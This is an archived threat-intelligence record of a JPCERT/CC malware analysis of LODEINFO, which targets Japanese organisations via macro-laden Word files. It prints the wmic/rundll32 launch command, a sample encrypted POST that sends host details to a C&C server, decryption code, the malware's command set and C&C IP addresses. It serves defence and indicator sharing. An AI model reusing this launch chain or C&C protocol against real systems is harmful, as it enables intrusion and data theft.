{ "id": "e84bb4ad-d868-4fed-a4fb-9550d175ec28", "created_at": "2026-04-06T00:14:56.209283Z", "updated_at": "2026-04-10T03:30:11.966738Z", "deleted_at": null, "sha1_hash": "12ba9e66b848f93413164d4639e181e9abeac648", "title": "Malware “LODEINFO” Targeting Japan - JPCERT/CC Eyes", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 697091, "plain_text": "Malware “LODEINFO” Targeting Japan - JPCERT/CC Eyes\r\nBy 喜野 孝太(Kota Kino)\r\nPublished: 2020-02-26 · Archived: 2026-04-05 14:26:23 UTC\r\nLODEINFO\r\nJPCERT/CC has been observing a new type of spear-phishing emails targeting Japanese organisations since\r\nDecember 2019.\r\nThe emails have a malicious Word file attachment leading to malware “LODEINFO”, which is newly observed.\r\nThis article introduces the details of this malware.\r\nHow LODEINFO is launched\r\nFigure 1 describes the flow of events from executing a Word file until LODEINFO is launched.\r\nFigure 1:Flow of events until LODEINFO runs\r\nBy enabling the macro, LODEINFO is created on the host and then executed by rundll32.exe with the following\r\ncommand:\r\nwmic process call create \"cmd /c cd %ProgramData%\u0026start rundll32.exe [LODEINFO file path] main\"\r\nAfter that, LODEINFO launches a svchost.exe process and inject the payload into the process. Then, it runs the\r\npayload as a thread.\r\nThe next section will explain the behaviour of LODEINFO after the injection.\r\nDetails of LODEINFO behaviour\r\nhttps://blogs.jpcert.or.jp/en/2020/02/malware-lodeinfo-targeting-japan.html\r\nPage 1 of 7\n\nLODEINFO communicates with specific hosts and operates according to the commands received from there.\r\nThis is an example of HTTP POST request that LODEINFO sends.\r\nPOST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/7\r\nHost: [hostname]\r\nContent-Length: 193\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\ndata=DIajqcc5lVuJpjwvr36msbQAAADitmc5LmhLlVituiM4OtDohYHRxBJ2R5yWjTYNyBTkUMGD2CPFpZw02cwPvl3Yb0SmUAAA\r\nThe data is encrypted with AES and then BASE64-encoded. It contains information such as name, language\r\nenvironment and MAC address of the host running LODEINFO. Figure 2 is the decoded data. (Please refer to\r\nAppendix A for the data format.)\r\nFigure 2: Part of decoded data\r\nThe following is a part of Python 3 code that decodes the HTTP POST request.\r\nfrom Crypto.Cipher import AES\r\nfrom base64 import urlsafe_b64decode\r\nfrom binascii import a2b_hex\r\ndef decypt_lodeinfo_data(enc_data: str, key: bytes, iv: bytes) -\u003e bytes:\r\n header_b64 = enc_data[:0x1C]\r\n header = urlsafe_b64decode(header_b64.replace(\".\", \"=\"))\r\n ## decode with base64\r\n postdata_size = int.from_bytes(header[0x10:0x14], byteorder=\"little\")\r\n postdata_b64 = enc_data[0x1C:0x1C+postdata_size]\r\n postdata = urlsafe_b64decode(postdata_b64.replace(\".\", \"=\"))\r\n ## decrypt with AES\r\n cipher = AES.new(key, AES.MODE_CBC, iv)\r\n decrypt_size = int.from_bytes(postdata[0x30:0x34],byteorder=\"little\")\r\n dec_data = cipher.decrypt(postdata[0x34:0x34+decrypt_size])\r\n ## remove junk bytes\r\nhttps://blogs.jpcert.or.jp/en/2020/02/malware-lodeinfo-targeting-japan.html\r\nPage 2 of 7\n\njunk_size = dec_data[-1]\r\n dec_data = dec_data[:decrypt_size-junk_size]\r\n return dec_data\r\nencrypted_data = \"DIajqcc5lVuJpjwvr36msbQAAADitmc5LmhLlVituiM4OtDohYHRxBJ2R5yWjTYNyBTkUMGD2CPFpZw02cw\r\nKEY = a2b_hex(\"E20EF6C66A838DA222821DB1C5777251F1A9D5D14D2344CED68A353BFCAC4C5A\")\r\nIV = a2b_hex(\"CC45ABAD58152C6150F157367ECC53F3\")\r\ndecrypted_data = decypt_lodeinfo_data(encrypted_data, KEY ,IV)\r\nprint(\"Decrypted Data: \", bytes.hex(decrypted_data))\r\nNext, LODEINFO receives commands. The response from the C\u0026C server is encrypted with AES and encoded\r\nwith BASE64 as in the HTTP POST request. According to the commands sent from the C\u0026C server, LODEINFO\r\nexecutes the following functions. (Please refer to Appendix B for command details.)\r\nExecute PE files\r\nExecute shellcode\r\nUpload/download files\r\nKill processes\r\nSend file list\r\nSend malware version\r\nCode in LODEINFO\r\nIt was revealed that many parts of the code that appears in LODEINFO are similar to the source code of\r\nLodePNG[1], a PNG file encoder/decoder shared on GitHub. However, it is not uncertain why LODEINFO\r\nutilises the code as it does not seem to be using LodePNG’s function.\r\nIn closing\r\nIt seems that LODEINFO is under development as it contains a string “v0.1.2” as version information and some\r\ndebug code in multiple sections. It is likely that the attack using this malware continues.\r\nWe have hash values of samples similar to LODEINFO in Appendix C and a list of C\u0026C servers in Appendix D.\r\nPlease make sure that none of your devices is communicating with such hosts.\r\n- Kota Kino\r\n(Translated by Yukako Uchida)\r\nReference\r\n[1] GitHub: LodePNG - PNG encoder and decoder in C and C++\r\nhttps://github.com/lvandeve/lodepng\r\nhttps://blogs.jpcert.or.jp/en/2020/02/malware-lodeinfo-targeting-japan.html\r\nPage 3 of 7\n\nAppendix A Exchanged data\r\nTable A-1: Data format (after BASE64 decoding)\r\nOffset Length Contents\r\n0x00 16 SHA512 value of AES key (first 16 bytes)\r\n0x10 4 Size of the BASE64-encoded data after 0x15\r\n0x14 1 Unknown\r\n0x15 48 SHA512 value of data before AES encryption (first 48 bytes)\r\n0x45 4 Size of AES-encrypted data\r\n0x49 variable AES-encrypted data\r\nTable A-2: Example of BASE64-decoded data\r\nAppendix B Commands\r\nTable B: Commands\r\nValue Contents\r\nMZ Execute PE files\r\n0xE9 Execute shellcode\r\ncd Change current directory\r\nls Send file list\r\nsend Download files\r\nhttps://blogs.jpcert.or.jp/en/2020/02/malware-lodeinfo-targeting-japan.html\r\nPage 4 of 7\n\nValue Contents\r\nrecv Upload files\r\ncat Upload files\r\nmemory Execute shellcode (inject into svchost.exe)\r\nkill Kill arbitrary process\r\nver Send malware version\r\nAppendix C SHA-256 Hash Value of a sample\r\nb50d83820a5704522fee59164d7bc69bea5c834ebd9be7fd8ad35b040910807f\r\nAppendix D C\u0026C servers\r\n45.67.231.169\r\n162.244.32.148\r\n193.228.52.57\r\n喜野 孝太(Kota Kino)\r\nKota Kino is Malware/Forensic Analyst at Incident Response Group, JPCERT/CC since August 2019.\r\nRelated articles\r\nhttps://blogs.jpcert.or.jp/en/2020/02/malware-lodeinfo-targeting-japan.html\r\nPage 5 of 7\n\nUpdate on Attacks by Threat Group APT-C-60\r\nCrossC2 Expanding Cobalt Strike Beacon to Cross-Platform Attacks\r\nMalware Identified in Attacks Exploiting Ivanti Connect Secure Vulnerabilities\r\nhttps://blogs.jpcert.or.jp/en/2020/02/malware-lodeinfo-targeting-japan.html\r\nPage 6 of 7\n\nDslogdRAT Malware Installed in Ivanti Connect Secure\r\nTempted to Classifying APT Actors: Practical Challenges of Attribution in the Case of Lazarus’s Subgroup\r\nSource: https://blogs.jpcert.or.jp/en/2020/02/malware-lodeinfo-targeting-japan.html\r\nhttps://blogs.jpcert.or.jp/en/2020/02/malware-lodeinfo-targeting-japan.html\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "references": [ "https://blogs.jpcert.or.jp/en/2020/02/malware-lodeinfo-targeting-japan.html" ], "report_names": [ "malware-lodeinfo-targeting-japan.html" ], "threat_actors": [ { "id": "15b8d5d8-32cf-408b-91b1-5d6ac1de9805", "created_at": "2023-07-20T02:00:08.724751Z", "updated_at": "2026-04-10T02:00:03.341845Z", "deleted_at": null, "main_name": "APT-C-60", "aliases": [ "APT-Q-12" ], "source_name": "MISPGALAXY:APT-C-60", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "ab47428c-7a8e-4ee8-9c8e-4e55c94d2854", "created_at": "2024-12-28T02:01:54.668462Z", "updated_at": "2026-04-10T02:00:04.564201Z", "deleted_at": null, "main_name": "APT-C-60", "aliases": [ "APT-Q-12" ], "source_name": "ETDA:APT-C-60", "tools": [ "SpyGlace" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434496, "ts_updated_at": 1775791811, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/12ba9e66b848f93413164d4639e181e9abeac648.pdf", "text": "https://archive.orkl.eu/12ba9e66b848f93413164d4639e181e9abeac648.txt", "img": "https://archive.orkl.eu/12ba9e66b848f93413164d4639e181e9abeac648.jpg" } }